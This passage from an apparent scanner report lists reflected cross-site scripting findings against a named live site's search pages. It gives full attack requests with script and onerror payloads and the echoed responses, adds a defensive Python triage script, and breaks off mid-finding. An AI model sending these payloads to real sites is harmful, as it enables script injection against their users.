HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/6a456<script>alert(1)</script>f799552621c47f5b8?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.36. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ab9"><script>alert(1)</script>becd9fa467488836d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult13ab9"><script>alert(1)</script>becd9fa467488836d/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult13ab9"><script>alert(1)</script>becd9fa467488836d/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.37. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fc47<script>alert(1)</script>5479294c802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult3fc47<script>alert(1)</script>5479294c802/media-chat/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult3fc47<script>alert(1)</script>5479294c802/media-chat/search.php was not found on this server.</p>
...[SNIP]...

2.38. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd552"><script>alert(1)</script>e48346a7d0bb14fd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chatdd552"><script>alert(1)</script>e48346a7d0bb14fd5/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:39:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chatdd552"><script>alert(1)</script>e48346a7d0bb14fd5/search.php?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.39. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8c25<script>alert(1)</script>2c6bd8ee8f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatf8c25<script>alert(1)</script>2c6bd8ee8f6/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatf8c25<script>alert(1)</script>2c6bd8ee8f6/search.php was not found on this server.</p>
...[SNIP]...

2.40. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a00f3<script>alert(1)</script>5084d4f9734 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/search.phpa00f3<script>alert(1)</script>5084d4f9734 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.phpa00f3<script>alert(1)</script>5084d4f9734 was not found on this server.</p>
...[SNIP]...

2.41. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89360"><script>alert(1)</script>eafc0b7c8065a3015 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/search.php89360"><script>alert(1)</script>eafc0b7c8065a3015?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php89360"><script>alert(1)</script>eafc0b7c8065a3015?cat=17&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.42. http://www.resellerbase.com/adult/media-chat/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d01f8<a>d1f5ce6bb31 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?keyword=search...&Submit3=Searchd01f8<a>d1f5ce6bb31&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?keyword=search...&Submit3=Searchd01f8<a>d1f5ce6bb31&opt=2 was not found on this server.</p>
...[SNIP]...

2.43. http://www.resellerbase.com/adult/media-chat/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the Submit3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec57"><a>5282617bf64 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search3ec57"><a>5282617bf64&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:33:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search3ec57"><a>5282617bf64&opt=1/more2.html" style="color: ">
...[SNIP]...

2.44. http://www.resellerbase.com/adult/media-chat/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa991"><img%20src%3da%20onerror%3dalert(1)>1b774318193 was submitted in the cat parameter. This input was echoed as fa991\"><img src=a onerror=alert(1)>1b774318193 in the application's response: the application prefixes the double quote with a backslash, but HTML attribute values have no backslash escape sequence, so the browser still treats the quote as the end of the href value and parses the injected <img> tag that follows it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack uses an onerror event handler on the injected <img> element, rather than a <script> tag, to introduce arbitrary JavaScript into the document.

Request

GET /adult/media-chat/search.php?cat=17fa991"><img%20src%3da%20onerror%3dalert(1)>1b774318193&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=17fa991\"><img src=a onerror=alert(1)>1b774318193">
...[SNIP]...

2.45. http://www.resellerbase.com/adult/media-chat/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b26b"><img%20src%3da%20onerror%3dalert(1)>c55f296bc7f9e8898 was submitted in the cat parameter. This input was echoed as 1b26b\"><img src=a onerror=alert(1)>c55f296bc7f9e8898 in the application's response: the double quote is backslash-escaped, which has no effect in an HTML attribute context, so the quote still terminates the href value and the injected <img> tag is parsed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack uses an onerror event handler on the injected <img> element, rather than a <script> tag, to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/search.php?cat=171b26b"><img%20src%3da%20onerror%3dalert(1)>c55f296bc7f9e8898&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=171b26b\"><img src=a onerror=alert(1)>c55f296bc7f9e8898">
...[SNIP]...
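The findings above fall into three reflection patterns: the canary-wrapped payload echoed as plain text inside the 404 page (2.31 to 2.35, 2.37, 2.39, 2.40), echoed unmodified inside a double-quoted href attribute (2.36, 2.38, 2.41), and echoed with the double quote backslash-escaped (2.44, 2.45). The script below is an added example, not part of the report and not Burp's own logic: it takes a response body plus the canary prefix, the real payload and the canary suffix, works out which HTML context the echo landed in, how the application transformed it, and whether that transformation actually neutralises it. The three sample bodies are trimmed copies of the report's own response snippets; the fourth is a constructed variant showing what the same line would look like if the value were HTML-encoded (the Python html.escape call with quote=True, which does what PHP's htmlspecialchars with ENT_QUOTES does). Function and class names are mine. The context detection is deliberately simple (double-quoted attributes and text nodes only; no single-quoted attributes, script or URL contexts) and is meant as a triage aid, not a replacement for manual verification in a browser.

```python
import html
from dataclasses import dataclass


@dataclass
class Reflection:
    context: str       # "text", "attribute" (double-quoted value) or "tag"
    encoding: str      # "unmodified", "backslash-escaped", "html-encoded" or "other"
    echoed: str        # what came back between the two canaries
    exploitable: bool  # whether the echo still lets the payload break the markup


def _context_at(body: str, idx: int) -> str:
    """Classify the HTML context of position idx.

    Walk back to the last '<' before idx. If a '>' closes it before idx we are in
    text between tags; otherwise we are inside a tag, and an odd number of '"'
    since that '<' puts us inside a double-quoted attribute value."""
    lt = body.rfind("<", 0, idx)
    if lt == -1 or body.find(">", lt, idx) != -1:
        return "text"
    return "attribute" if body.count('"', lt, idx) % 2 == 1 else "tag"


def _encoding_of(echoed: str, core: str) -> str:
    """Compare the echoed bytes with the payload that was sent."""
    if echoed == core:
        return "unmodified"
    if echoed == core.replace('"', '\\"'):
        return "backslash-escaped"          # addslashes-style escaping, useless in HTML
    if echoed == html.escape(core, quote=True):
        return "html-encoded"               # the correct output encoding for this context
    return "other"


def _exploitable(context: str, encoding: str, core: str) -> bool:
    if encoding not in ("unmodified", "backslash-escaped"):
        return False
    if context == "text":
        return "<" in core                  # a new element can be opened
    if context == "attribute":
        # HTML has no backslash escape, so \" still terminates the attribute value
        return core.startswith('"')
    return False


def analyse(body: str, prefix: str, core: str, suffix: str):
    """Locate prefix + <something> + suffix in body and report how the middle was reflected.

    prefix/suffix are the random canaries the scanner wraps around the real payload
    (core); matching on them avoids false hits on legitimate page content."""
    start = body.find(prefix)
    if start == -1:
        return None
    end = body.find(suffix, start + len(prefix))
    if end == -1:
        return None
    echoed = body[start + len(prefix):end]
    context = _context_at(body, start)
    encoding = _encoding_of(echoed, core)
    return Reflection(context, encoding, echoed, _exploitable(context, encoding, core))


# Trimmed copies of the report's response snippets (2.34, 2.36, 2.44).
SAMPLE_404 = ('<p>The requested URL /adult/media-chat/ccee7<script>alert(1)</script>4892fe500c3'
              '?select=http%253a%252f%252fwww.resellerbase.com was not found on this server.</p>')
SAMPLE_ATTR = ('<a href="/adult13ab9"><script>alert(1)</script>becd9fa467488836d/media-chat/search.php'
               '?cat=17&keyword=search...&Submit3=Search&opt=1/more2.html" style="color: ">')
SAMPLE_SLASH = ('<a href="http://www.resellerbase.com/add.php?cat=17fa991\\"><img src=a onerror=alert(1)>'
                '1b774318193">')
# Constructed: the 2.44 line as it would look with the value HTML-encoded before output.
SAMPLE_SAFE = ('<a href="http://www.resellerbase.com/add.php?cat=17fa991&quot;&gt;&lt;img src=a '
               'onerror=alert(1)&gt;1b774318193">')

CASES = [
    ("2.34 404 page",        SAMPLE_404,   "ccee7", "<script>alert(1)</script>",        "4892fe500c3"),
    ("2.36 href attribute",  SAMPLE_ATTR,  "13ab9", '"><script>alert(1)</script>',      "becd9fa467488836d"),
    ("2.44 backslash",       SAMPLE_SLASH, "fa991", '"><img src=a onerror=alert(1)>',   "1b774318193"),
    ("encoded (constructed)", SAMPLE_SAFE, "fa991", '"><img src=a onerror=alert(1)>',   "1b774318193"),
]

if __name__ == "__main__":
    for name, body, pre, core, suf in CASES:
        r = analyse(body, pre, core, suf)
        print(f"{name:24} context={r.context:9} encoding={r.encoding:17} exploitable={r.exploitable}")
```

Run as-is it reports the first three cases as exploitable and the constructed encoded case as safe. The point of the "backslash-escaped" branch is the one the 2.44 and 2.45 findings hinge on: an escaping routine written for a string literal or a SQL context changes nothing for the HTML parser, and only context-appropriate output encoding (entity-encoding the quote and angle brackets) closes the hole. The same applies to the 404 page: the requested URL has to be entity-encoded before it is printed into the error message.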

2.46. http://www.resellerbase.com/adult/media-chat/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bd7d1<a>87b995cfb69 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/search.php?keyword=search...bd7d1<a>87b995cfb69&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/search.php?keyword=search...bd7d1<a>87b995cfb69&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.47. http://www.resellerbase.com/adult/media-chat/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1de"><a>1f19faa4207 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...4d1de"><a>1f19faa4207&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...4d1de"><a>1f19faa4207&Submit3=Search&opt=1/more2.html" style="color: ">
...[SNIP]...

2.48. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc05"><script>alert(1)</script>fe070232f8744b8a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&/3cc05"><script>alert(1)</script>fe070232f8744b8a8opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&/3cc05"><script>alert(1)</script>fe070232f8744b8a8opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.49. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f469"><a>0a51b81895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that issue 2.48 shows the same href attribute echoing an unencoded <script> tag, so the lower confidence here most likely reflects the payload tried rather than any filtering.

Request

